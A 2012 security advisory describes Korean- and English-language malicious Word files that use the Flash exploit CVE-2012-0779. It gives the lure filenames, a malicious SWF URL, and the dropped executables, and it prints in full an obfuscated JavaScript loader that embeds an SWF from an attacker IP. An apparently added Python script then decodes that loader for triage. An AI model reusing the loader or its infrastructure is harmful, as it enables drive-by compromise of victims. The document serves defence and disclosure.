6/04/2012

[Warning] Malicious file for APT attack using CVE-2012-0779 exploit


1. Introduction

The INCA Internet Response Team has detected attacks using the latest Adobe Flash Player exploit (CVE-2012-0779). In particular, we found malicious DOC files carrying it. For this reason, users should keep Adobe Flash Player updated to the latest version to stay safe from this threat, and should be careful when downloading attachments from suspicious e-mails.



2. Cases of CVE-2012-0779

Various malicious files using the CVE-2012-0779 exploit have been found. The following figure shows the malicious DOC files.



■ Malicious e-mail on April 13, 2012

This DOC file uses the CVE-2012-0779 exploit and is written in Korean, so we can assume it is intended for an APT attack in Korea.

The file name is "유통관련자료_수정본.doc". The run screen is as follows.


This malicious DOC file contains script code that makes the user's PC access a certain URL, from which the malicious "exp.swf" was served. This SWF has since been removed from the server.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file also contains a malicious EXE (XOR encoded).
Besides this file, various malicious files written in English were found.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains the CVE-2012-0779 exploit. The following figure shows its run screen.


The DOC file includes the following script code, which loads the malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))
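To triage a loader like the one above, the argument of unescape() can be percent-decoded, the <embed> src pulled out, and the hex info parameter inflated: its 78 9c prefix and trailing four-byte checksum identify a zlib stream, which decompresses to a host:port string. This is an added Python example, not code from INCA Internet; the sample string is the one quoted above, and the function names are this example's own.

```python
import re
import zlib
from urllib.parse import parse_qs, unquote, urlsplit

# Loader string quoted in the advisory above (copied from the page, not constructed).
SAMPLE = ("eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf"
          "?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000"
          "%3E%3C/embed%3E')))")


def unescape_payload(script: str) -> str:
    """Return the percent-decoded argument of the unescape('...') call."""
    m = re.search(r"unescape\(\s*'([^']*)'\s*\)", script)
    if not m:
        raise ValueError("no unescape('...') call found")
    # JS unescape() also accepts %uXXXX; this sample only uses %XX, which unquote handles.
    return unquote(m.group(1))


def embed_src(html: str) -> str:
    """Return the src attribute of the first <embed> tag (bare or quoted value)."""
    m = re.search(r"<embed\s+[^>]*?src=[\"']?([^\s\"'>]+)", html, re.IGNORECASE)
    if not m:
        raise ValueError("no <embed src=...> found")
    return m.group(1)


def decode_info(info_hex: str) -> str:
    """Inflate the hex 'info' value after checking the zlib header (CMF/FLG) fields."""
    data = bytes.fromhex(info_hex)
    cmf, flg = data[0], data[1]
    if cmf & 0x0F != 8 or (cmf * 256 + flg) % 31 != 0:
        raise ValueError("info is not a zlib stream")
    # zlib.decompress also verifies the trailing Adler-32 checksum.
    return zlib.decompress(data).decode("ascii")


def triage(script: str) -> dict:
    """Pull the SWF location and decoded query parameters out of an obfuscated loader."""
    src = embed_src(unescape_payload(script))
    url = urlsplit(src)
    params = parse_qs(url.query)
    return {
        "swf_host": url.hostname,
        "swf_path": url.path,
        "info": decode_info(params["info"][0]),
        "infosize": params.get("infosize", [None])[0],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The decoded info value is a second host:port endpoint, which is worth adding to the same blocklist as the SWF host itself.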


After the malicious file is downloaded, the following files are executed in sequence.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

The official Adobe Flash Player version 11.2.202.235 is now being distributed. To be safe from the CVE-2012-0779 exploit, users should install the latest update.

[Download]
http://get.adobe.com/kr/flashplayer/


To keep your PC safe from the security threats posed by these malicious attachments, we recommend downloading the latest security updates and following the "Security management tips" for general users below.

Security management tips

1. Keep the OS and applications updated with the latest security patches.
2. Use anti-virus software from a trustworthy security company, keep its engine updated, and keep real-time detection turned on.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messengers and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.
